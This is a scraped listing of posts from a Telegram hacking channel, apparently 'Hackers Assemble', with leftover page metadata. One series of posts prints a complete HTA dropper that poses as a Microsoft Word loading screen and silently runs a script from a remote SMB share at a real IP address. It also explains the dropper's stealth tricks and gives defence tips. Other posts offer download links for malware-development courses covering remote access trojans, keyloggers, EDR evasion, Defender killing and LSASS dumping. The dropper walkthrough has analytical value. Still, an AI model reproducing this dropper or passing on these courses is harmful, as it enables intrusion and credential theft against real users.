π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"image":["https://n2.tlmtr.cc/p/_m2ir2sZOz1nCBe0RuiFxHYy4YYW3OEHuUxKWxOw7Z7o?ty=l"],"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":763},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":28}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-09-03T17:27:31Z"}}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3147","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3147","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3147","headline":"How to deploy locally ? Unzip the folder cd the-opsec-bible python -m venv venv Linux: source venv/bin/activa…","articleBody":"How to deploy locally ?\n\nUnzip the folder\n\ncd the-opsec-bible\npython -m venv venv\n\nLinux: source venv/bin/activate\nWindows: venv\\Scripts\\activate\n\npip install -r requirements.txt\n\nService the blog locally :\n\nmkdocs serve\n\nVisit : http://127.0.0.1:8000","datePublished":"2026-09-04T15:16:15Z","dateModified":"2026-09-04T15:16:15Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1464},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":63}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-08-16T20:43:59Z"}}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3146","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3146","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3146","headline":"⚑️ The Opsec Bible ⚑️ The OPSEC Bible is an educational project designed to teach you how to become \"ungovern…","articleBody":"⚑️ The Opsec Bible ⚑️\n\nThe OPSEC Bible is an educational project designed to teach you how to become \"ungovernable\" through proper Operational Security (OPSEC). It provides comprehensive, step-by-step guides covering three core levels: Privacy, Anonymity, and Deniability, for both client-side and server-side activities. The project aims to counter misinformation and simplify complex security concepts, making them accessible to a wide audience. It is built around an agorist and anti-statist philosophy, encouraging self-reliance and freedom from government control. The entire content is open-source and can be read offline, run locally, or even contributed to for Monero rewards.\n\nπŸ§… Tor URL (Source): http://opbible7nans45sg33cbyeiwqmlp5fu7lklu6jd6f3mivrjeqadco5yd.onion/opsec/","datePublished":"2026-09-04T15:16:14Z","dateModified":"2026-09-04T15:16:14Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"image":["https://n2.tlmtr.cc/p/_50hzmVveB3DIQY55MWG95DMLnaWUh9mNVfFU0OqL6hc?ty=l"],"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1513},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":45}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2026-08-16T20:41:23Z"}}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3145","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3145","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3145","headline":"Let's summarize this together: A user claim he got scammed from FalconC2 and now he is scamming people in Hac…","articleBody":"Let's summarize this together: A user claim he got scammed from FalconC2 and now he is scamming people in Hacker Assemble because he got banned instead of talking normal with the Admin of FalconC2 ?","datePublished":"2026-09-01T23:32:18Z","dateModified":"2026-09-01T23:32:18Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":46,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":2275},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":46}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3142","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3142","mainEntityOfPage":"https://telemetr.io/en/channels/1526652665-hackers_assemble/posts/3142","headline":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","datePublished":"2026-09-01T23:31:18Z","dateModified":"2026-09-01T23:31:18Z","author":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"publisher":{"@type":"Organization","name":"π—›π—”π—–π—žπ—˜π—₯𝗦 π—”π—¦π—¦π—˜π— π—•π—Ÿπ—˜","url":"https://telemetr.io/en/channels/1526652665-hackers_assemble","image":"https://img.tlmtr.io/c/1FjG65/6197263549429035252?ty=x"},"commentCount":11,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":2222},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":2},{"@type":"InteractionCounter","interactionType":"https://schema.org/CommentAction","userInteractionCount":11}]}}]}
Channel Posts
Defense Recommendations πŸ›‘ Organizations: 🟒Block HTA Execution: Consider blocking .hta files in email gateways and restricting mshta.exe execution 🟒Monitor SMB Traffic: Alert on outbound SMB traffic to external IPs 🟒Enable Script Block Logging: Use PowerShell logging to capture script activity 🟒User Education: Train users to recognize suspicious file extensions (.hta, .wsf) 🟒Application Whitelisting: Restrict which applications can spawn child processes Individuals: 🟒Never open .hta files from untrusted sources 🟒Verify the actual file extension before opening 🟒Be suspicious of any document that asks you to "wait" while it loads 🟒Check the process in Task Manager if something seems off

2
πŸ”‘ Key Stealth Techniques Used Living Off the Land (LOLBins) πŸ”΄UsesΒ mshta.exeΒ - legitimate Windows executable πŸ”΄UsesΒ wscript.exeΒ - legitimate Windows scripting host Both are trusted by most security products Execution Suppression πŸ”΄//BΒ flag suppresses error messages πŸ”΄Window styleΒ 0Β hides command windows πŸ”΄No visible console output Quick Self-Termination πŸ”΄TheΒ Self.CloseΒ method removes the HTA from view πŸ”΄Leaves no obvious trace for the user Network Obfuscation πŸ”΄Uses SMB protocol (port 445) via UNC path πŸ”΄Blends with legitimate network file access πŸ”΄Harder to detect than HTTP/HTTPS in some environments More about lolbins: https://t.me/c/3313734094/4258
802
3
The Malicious Payload Execution The VBScript contains the actual malicious logic: Sub Window_OnLoad Set s=CreateObject("WScript.Shell") s.Run "wscript //B \\144.126.148.231\share\run.wsf",0 Self.Close End Sub 1. Create the Shell Object πŸ”΄CreateObject("WScript.Shell") - Instantiates a powerful Windows object πŸ”΄This object provides access to system functions, including running programs 2. Execute the Remote Payload πŸ”΄s.Run - Executes the command πŸ”΄wscript //B - Runs Windows Script Host in batch/quit mode (no error dialogs) πŸ”΄\\144.126.148.231\share\run.wsf - UNC path to remote script on the attacker's server πŸ”΄,0 - Hides the command windows completely 3. Clean Up πŸ”΄Self.Close - Immediately closes the HTA window πŸ”΄Removes visual evidence of the attack
626
4
The User Interface Deception The HTML/CSS creates a convincing loading screen: <div class="loading"> <div class="spinner"></div> <h2>Opening Document...</h2> <p>Please wait while Microsoft Office loads your document.</p> </div> Purpose: ▢️Buys time for the malware to execute in the background ▢️Creates a plausible reason for system activity ▢️Mimics legitimate Office document loading behavior ▢️Reduces user suspicion if the file "fails" to open The loading spinner animation reinforces the illusion of legitimate processing.
534
5
This is a classicΒ HTA (HTML Application)Β dropper designed to download and execute a secondary payload from a remote server. It leverages legitimate Windows components to bypass security controls through social engineering and living-off-the-land techniques. <html> <head> <title>Microsoft Office Document</title> <HTA:APPLICATION ID="doc" APPLICATIONNAME="Microsoft Word" BORDER="dialog" BORDERSTYLE="normal" CAPTION="yes" ICON="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" SHOWINTASKBAR="yes" SINGLEINSTANCE="yes" SYSMENU="yes" WINDOWSTATE="normal" /> <style> body{font-family:Segoe UI;margin:40px;background:#f3f3f3} .loading{text-align:center;padding:60px} .spinner{border:4px solid #e0e0e0;border-top:4px solid #0078d4;border-radius:50%;width:40px;height:40px;animation:spin 1s linear infinite;margin:20px auto} @keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}} h2{color:#333;font-weight:normal} p{color:#666} </style> </head> <body> <div class="loading"> <div class="spinner"></div> <h2>Opening Document...</h2> <p>Please wait while Microsoft Office loads your document.</p> </div> <script language="VBScript"> Sub Window_OnLoad Set s=CreateObject("WScript.Shell") s.Run "wscript //B \\144.126.148.231\share\run.wsf",0 Self.Close End Sub </script> </body> </html> The HTA Application Object The <HTA:APPLICATION> tag transforms this HTML file into a trusted Windows application: APPLICATIONNAME "Microsoft Word" - Makes the process appear as "Microsoft Word" in task manager ICON C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE - Uses the legitimate Word icon to appear authentic BORDER "dialog" - Creates a professional-looking dialog window SHOWINTASKBAR "yes" - Blends in with legitimate applications SINGLEINSTANCE "yes" Prevents duplicate windows that might raise suspision By using the genuine Word icon, this HTA exploits the user's trust in the Microsoft Office ecosystem. Even a technically savvy user might overlook this if they glance at the taskbar.
467
6
The following table lists the members exposed by the HTA:APPLICATION object. APPLICATIONNAME β€” Sets or gets the name of the HTML Application (HTA) BORDER β€” Sets or gets the type of window border for the HTML Application (HTA) BORDERSTYLE β€” Sets or gets the style set for the content border in the HTML Application (HTA) window CAPTION β€” Sets or gets a Boolean value that indicates whether the window is set to display a title bar or a caption, for the HTML Application (HTA). commandLine β€” Gets the argument used to launch the HTML Application (HTA) CONTEXTMENU β€” Sets or gets a string value that indicates whether the context menu is displayed when the right mouse button is clicked ICON β€” Sets or gets the name and location of the icon specified in the HTML Application (HTA) INNERBORDER β€” Sets or gets a string value that indicates whether the inside 3-D border is displayed MAXIMIZEBUTTON β€” Sets or gets a Boolean value that indicates whether a Maximize button is displayed in the title bar of the HTML Application (HTA) window MINIMIZEBUTTON β€” Sets or gets a Boolean value that indicates whether a Minimize button is displayed in the title bar of the HTML Application (HTA) window NAVIGABLE β€” Sets or gets a string value that indicates whether linked documents are loaded in the main HTML Application (HTA) window or in a new browser window. SCROLL β€” Sets or gets a string value that indicates whether the scroll bars are displayed. SCROLLFLAT β€” Sets or gets a string value that indicates whether the scroll bar is 3-D or flat SELECTION β€” Sets or gets a string value that indicates whether the content can be selected with the mouse or keyboard. SHOWINTASKBAR β€” Sets or gets a value that indicates whether the HTML Application (HTA) is displayed in the Windows taskbar SINGLEINSTANCE β€” Sets or gets a value that indicates whether only one instance of the specified HTML Application (HTA) can run at a time. SYSMENU β€” Sets or gets a Boolean value that indicates whether a system menu is displayed in the HTML Application (HTA). VERSION β€” Sets or gets the version number of the HTML Application (HTA). WINDOWSTATE β€” Sets or gets the initial size of the HTA window. Source: https://learn.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)
489
7
πŸ‘Ώ HTA Droppers HTML Applications (HTAs) are a favorite tool for this exact kind of deception. Let's break down one such dropper to understand how it works from a malware analysis perspective. What is an HTA? An HTA, or HTML Application, is a Windows program that uses the structure of a webpage (HTML) and the power of scripting languages like VBScript or JavaScript. You can think of it as a hybrid: it looks and acts like a standard Windows application but is built with web technologies. A key reason HTAs are valuable to malware authors is that they run with the same privileges as the user who opens them, bypassing many of the security restrictions typically applied to web scripts in a browser. The HTA is executed using theΒ mshta.exeΒ utility, which is a standard, trusted Windows file. The core of an HTA is theΒ <HTA:APPLICATION>Β element. This special tag is what transforms a simpleΒ .htmlΒ file into a powerfulΒ .htaΒ application. It provides a set of attributes that control the application's window, appearance, and behavior
600
8
+1
❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy
2
9
+1
❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy
761
10
Building a Custom Remote Access Trojan (RAT) This course is all about getting hands-on with the the inner workings of advance
Building a Custom Remote Access Trojan (RAT) This course is all about getting hands-on with the the inner workings of advanced malware, specifically Remote Access Trojans, or RATs. You’ll learn how they’re built, how they work behind the scenes, and how they avoid detection. We’ll start with the basics: what makes up a RAT, how they’re structured, and examples from the real world. Then we’ll dive into building your own, step by step. You’ll implement features like process listing, file hiding, keylogging, and remote desktop stealing. You’ll also explore advanced evasion techniques like NTDLL unhooking, time stomping, and rootkit behavior. Each lesson mixes theory with code so you understand both the β€œwhy” and the β€œhow.” You’ll build working proof-of-concepts along the way and finish the course with a solid grasp of how real-world malware operates and how defenders can spot it. Requirements 🟒C++ 🟒Basic Malware Knowndelge Info : https://0x12darkdev.net/courses/building-a-custom-remote-access-trojan-rat/ πŸ”— Download: https://t.me/c/3313734094/5071
739
11
+4
❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy
662
12
Windows Offensive Evasion Most evasion content out there teaches you to run a tool and hope it works. This course teaches you
Windows Offensive Evasion Most evasion content out there teaches you to run a tool and hope it works. This course teaches you why the tool works, so when it stops working, you’re not stuck. We start from the basics: how Windows actually loads and monitors your process, what EDRs are looking at, and why most detections happen. From there we go deeper module by module, userland hooking, AMSI and ETW bypasses, stealthy process injection, API obfuscation, userland and kernel rootkits, all the way down to kernelmode techniques like BYOVD exploitation Every lesson follows the same idea: understand the mechanism first, then the technique, then how defenders actually catch it. No black boxes, no β€œjust run this script.” Built for red teamers, malware devs, and anyone who wants to stop copy-pasting PoCs and start understanding what’s happening under the hood Requirements 🟒Comfortable with C or C++ (you’ll be reading and adapting code, not writing from scratch every time) 🟒Basic understanding of the Windows API (processes, threads, handles) 🟒Familiarity with assembly (x64) is helpful but not mandatory, it’s explained when needed 🟒Basic Windows internals concepts (PEB, TEB, memory layout) are a plus but not required, since foundational modules cover this 🟒A Windows VM for testing (isolated, not your host machine) 🟒Visual Studio (Community edition is fine) or a comparable C/C++ toolchain 🟒WinDbg or x64dbg for debugging exercises Info: https://0x12darkdev.net/courses/windows-offensive-evasion/ πŸ”— Download: https://t.me/c/3313734094/5065
567
13
+1
❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy
558
14
Introduction Windows Malware Development This course teaches advanced Windows malware development in a clear and practical wa
Introduction Windows Malware Development This course teaches advanced Windows malware development in a clear and practical way. You will learn how malware is created for Windows systems and how it works. It is useful for red teamers, malware developers, and anyone interested in cybersecurity. You will learn how to understand, build, and defend against malicious software. All examples and projects are written in C++. β”œβ”€β”€ Introduction β”œβ”€β”€ Theory β”œβ”€β”€ Shellcode Generator β”œβ”€β”€ Shellcode Execution β”œβ”€β”€ Shellcode Encryption β”œβ”€β”€ Process Injection β”œβ”€β”€ DLL Injection β”œβ”€β”€ Inter Process Communication β”œβ”€β”€ Downloader β”œβ”€β”€ Multiplatform β”œβ”€β”€ Malware as Service β”œβ”€β”€ Persistence β”œβ”€β”€ Import Address Table & String Encryption β”œβ”€β”€ Sandbox and Virtual Machines β”œβ”€β”€ Anti Debugging β”œβ”€β”€ Microsoft Signatures β”œβ”€β”€ Reverse Shell β”œβ”€β”€ Keylogger β”œβ”€β”€ Windows Defender Killer β”œβ”€β”€ Privilege Escalation β”œβ”€β”€ API Hooking β”œβ”€β”€ Parent PID Spoofing β”œβ”€β”€ Process Token β”œβ”€β”€ Dump Lsass.exe β”œβ”€β”€ Malicious Office Documents β”œβ”€β”€ Botnet Infrastructure └── Conclusions Info: https://0x12darkdev.net/courses/introduction-malware-development/ πŸ”—Download : https://t.me/c/3313734094/5062
572
15
+2
❀️ SHARE AND SUPPORT US❀️ πŸ”— Link: https://t.me/+ZcWpNaZALkIxYjUy
583
16
πŸ‘¨β€πŸ’» Learning C++ for Malware Development This course teaches C++ basics for beginners. It starts from zero and focuses on W
πŸ‘¨β€πŸ’» Learning C++ for Malware Development This course teaches C++ basics for beginners. It starts from zero and focuses on Windows tools. You’ll learn code structure, variables, loops, functions, pointers, files, objects, and more. Then, it covers Windows API like processes, memory, registry, services, and DLLs. All examples are safe and educational, no real malware. Perfect if you want to build system skills for security work later. What You’ll Learn: Dive into C++ from the ground up, with hands-on coding exercises, mini-projects, and practical examples drawn from system-level programming. By the end, you’ll be confident in writing efficient C++ code, managing memory, interacting with the Windows API, and creating reusable DLLs, all while emphasizing best practices, debugging, and code modularity. Features πŸ”΅Beginner-Friendly Structure: Starts from absolute basics like variables, loops, and functions, assuming minimal prior programming knowledge. πŸ”΅Comprehensive C++ Coverage: Includes syntax, data types, control flow, pointers, arrays, strings, STL intro, file I/O, OOP (classes, polymorphism), enums, error handling, and debugging. πŸ”΅Windows-Specific Focus: Dives into Windows API for system programming, covering processes, threads, memory management, registry, services, environment variables, IPC (named pipes), hooks, notifications, and timers, all with ethical, non-malicious examples. β”œβ”€β”€ Introduction and Setup β”œβ”€β”€ C++ Fundamentals β”œβ”€β”€ Advanced C++ & Windows API Fundamentals └── Creating and Using DLLs in C++ https://0x12darkdev.net/courses/learning-c-for-malware-development/ πŸ”— Download : https://t.me/c/3313734094/5057
763
17
How to deploy locally ? Unzip the folder cd the-opsec-bible python -m venv venv Linux: source venv/bin/activate Windows: venv\Scripts\activate pip install -r requirements.txt Service the blog locally : mkdocs serve Visit : http://127.0.0.1:8000
1 464
18
⚑️ The Opsec Bible ⚑️ The OPSEC Bible is an educational project designed to teach you how to become "ungovernable" through pr
⚑️ The Opsec Bible ⚑️ The OPSEC Bible is an educational project designed to teach you how to become "ungovernable" through proper Operational Security (OPSEC). It provides comprehensive, step-by-step guides covering three core levels: Privacy, Anonymity, and Deniability, for both client-side and server-side activities. The project aims to counter misinformation and simplify complex security concepts, making them accessible to a wide audience. It is built around an agorist and anti-statist philosophy, encouraging self-reliance and freedom from government control. The entire content is open-source and can be read offline, run locally, or even contributed to for Monero rewards. πŸ§… Tor URL (Source): http://opbible7nans45sg33cbyeiwqmlp5fu7lklu6jd6f3mivrjeqadco5yd.onion/opsec/
1 513
19
Let's summarize this together: A user claim he got scammed from FalconC2 and now he is scamming people in Hacker Assemble because he got banned instead of talking normal with the Admin of FalconC2 ?
2 275
20
+2
No text...
2 222